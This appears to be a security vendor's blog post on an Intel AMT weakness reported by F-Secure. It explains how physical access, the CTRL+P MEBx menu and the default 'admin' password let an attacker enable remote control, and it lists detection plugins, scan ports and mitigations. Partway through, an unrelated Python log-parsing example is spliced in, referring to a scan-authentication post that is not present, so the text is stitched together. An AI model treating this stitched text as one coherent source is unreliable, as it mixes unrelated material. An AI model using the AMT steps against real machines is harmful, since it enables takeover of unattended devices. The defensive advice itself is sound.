The release of new research from F-Secure spells more trouble for Intel’s Active Management Technology (AMT). AMT is used for remote access monitoring and maintenance in corporate environments. Previously, in 2017, researchers discovered a critical vulnerability in AMT that made headlines: a wide-reaching privilege escalation vulnerability (INTEL-SA-00075, CVE-2017-5689). Now, AMT is in the news again this week, as another serious security issue has been disclosed. The issue was discovered by a security researcher with the Finnish security company F-Secure. It could allow an attacker who has physical access to an affected device to enable the technology’s remote access features, letting them take complete control of the machine while on the same network segment.
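Before the details of the AMT issue, an added example for the Tracking Scan Authentication Failures post above (example code, not Tenable's plugin): it runs the reporting logic that post describes over constructed per-attempt records, grouping failures per host and protocol, listing each failed credential with its reason, and suppressing a host/protocol pair for which any credential succeeded. The key=value log format, the hosts and credentials, and the stale_credentials triage heuristic are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed per-attempt records in a hypothetical key=value log format
# (not Nessus output); one line per credential tried against a host/protocol.
SAMPLE_LOG = """\
host=10.0.0.5 proto=ssh cred=svc_scan result=ok
host=10.0.0.5 proto=ssh cred=ops_admin result=fail reason="password expired"
host=10.0.0.5 proto=smb cred=CORP\\svc_scan result=fail reason="STATUS_ACCOUNT_LOCKED_OUT"
host=10.0.0.7 proto=ssh cred=svc_scan result=fail reason="Permission denied (publickey,password)"
host=10.0.0.7 proto=ssh cred=ops_admin result=fail reason="Permission denied (publickey,password)"
host=10.0.0.7 proto=mysql cred=scanner result=fail reason="Access denied for user"
host=10.0.0.9 proto=iseries cred=QSCAN result=ok
"""

ATTEMPT_RE = re.compile(
    r'^host=(\S+) proto=(\S+) cred=(\S+) result=(ok|fail)(?: reason="([^"]*)")?$')

def parse_attempts(lines):
    """Yield (host, proto, cred, ok, reason) for each well-formed record."""
    for line in lines:
        m = ATTEMPT_RE.match(line.strip())
        if m:  # malformed lines are skipped rather than aborting the report
            host, proto, cred, result, reason = m.groups()
            yield host, proto, cred, result == "ok", reason or ""

def consolidate(lines):
    """Consolidated failure report keyed by (host, proto).

    Mirrors the behaviour described in the post: a host/protocol pair for
    which at least one credential succeeded is not reported at all;
    otherwise every failed credential is listed together with its reason.
    """
    failures = defaultdict(list)
    succeeded = set()
    for host, proto, cred, ok, reason in parse_attempts(lines):
        if ok:
            succeeded.add((host, proto))
        else:
            failures[(host, proto)].append((cred, reason))
    return {key: creds for key, creds in failures.items() if key not in succeeded}

def stale_credentials(lines, min_hosts=2):
    """Triage heuristic added by this example (not a plugin feature): credentials
    that failed on at least min_hosts hosts and never succeeded anywhere are
    likely expired, locked out or revoked and worth checking first."""
    failed_on = defaultdict(set)
    ok_somewhere = set()
    for host, _proto, cred, ok, _reason in parse_attempts(lines):
        if ok:
            ok_somewhere.add(cred)
        else:
            failed_on[cred].add(host)
    return {cred for cred, hosts in failed_on.items()
            if len(hosts) >= min_hosts and cred not in ok_somewhere}

def render(report):
    """Plain-text report, one block per host/protocol with no working credential."""
    out = []
    for (host, proto), creds in sorted(report.items()):
        out.append(f"{host} {proto}: no credential authenticated")
        out.extend(f"  {cred}: {reason or 'no reason given'}" for cred, reason in creds)
    return "\n".join(out)

if __name__ == "__main__":
    print(render(consolidate(SAMPLE_LOG.splitlines())))
    print("likely stale credentials:", sorted(stale_credentials(SAMPLE_LOG.splitlines())))
```

On the sample data, 10.0.0.5/ssh is not reported because svc_scan succeeded there, while its SMB failure and both 10.0.0.7 protocols are, and ops_admin is flagged as likely stale because it failed on two hosts without succeeding anywhere.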
DETAILS

The F-Secure advisory explains that an attacker who has physical access to the device can simply reboot the machine and press CTRL+P during bootup to reach the Intel Management Engine BIOS Extension (MEBx) login. If Intel AMT hasn’t already been provisioned by the device owner or corporate IT, the MEBx login is protected only by the default password of admin. By accessing the MEBx configuration, an attacker could enable remote access and set AMT’s user opt-in to “None,” allowing the attacker to gain remote access to the device without the user’s consent. This gives the attacker the ability to take full control of the machine if they’re on the same wired or wireless network.

While the likelihood of an attack is reduced by the requirement of physical access to the device, exploitation of this issue is both extremely simple and takes very little time for a reasonably skilled attacker. Security professionals often warn users not to leave a laptop in a hotel room or other unsecured location where the device is unattended. If the computer is left unattended, the attacker has an opportunity to reboot the system, alter the MEBx configuration and be gone – all before the user returns. A simple flaw such as this becomes a gold mine for an attacker determined to target an individual or organization.

DETECTION METHODS

New plugins have been released for Tenable.io Vulnerability Management, SecurityCenter and Nessus to determine whether a device has Intel AMT remote access enabled and running. Plugin #105778, Intel Management Engine Active Management Technology [AMT] Remote Access Enabled, detects whether the Intel AMT remote access feature is enabled based on the banner of the service listening on port 16992. Using a previously released plugin, #102992, Intel Active Management Technology (AMT) detection, you can identify systems potentially at risk from this new vulnerability without scanning again. (screenshot)
SCAN POLICY MODIFICATIONS

The default port scanning preferences need to be modified to enable detection of this vulnerability: set the port scanning preferences to probe ports 16992, 16993 and 623 in addition to the default ports. Also, scan the system using the SYN and TCP network scanners in addition to the local scanner option, because the local enumerator is unable to enumerate the Intel AMT ports. (screenshot)

To check whether your system supports Intel AMT, you can use the plugins mentioned above. Alternatively, you may check your BIOS manually for Intel AMT and MEBx by pressing CTRL-P during the boot process. Intel has also provided a reference document to help determine whether you have an Intel AMT, Intel SBA or Intel ISM capable system.

WRAPPING UP – WHAT YOU CAN DO RIGHT NOW

Here are a few suggestions on what you can do right now to protect your organization from this newly discovered vulnerability:

* If your organization has devices that support Intel AMT and the Intel Management Engine BIOS Extension, log into the MEBx menu and set a strong password to replace the default password of admin. And if you don’t plan to use Intel AMT, consider disabling it.
* Given the physical proximity required for this particular attack to be executed, remind users to always be mindful of operational security: don’t leave laptops unattended in unsecured locations.
* Get plugin #105778, Intel Management Engine Active Management Technology [AMT] Remote Access Enabled, which detects whether the Intel AMT remote access feature is enabled based on the banner of the service listening on port 16992.
* Learn more about Tenable.io, which we continuously update so you can detect the latest vulnerabilities quickly.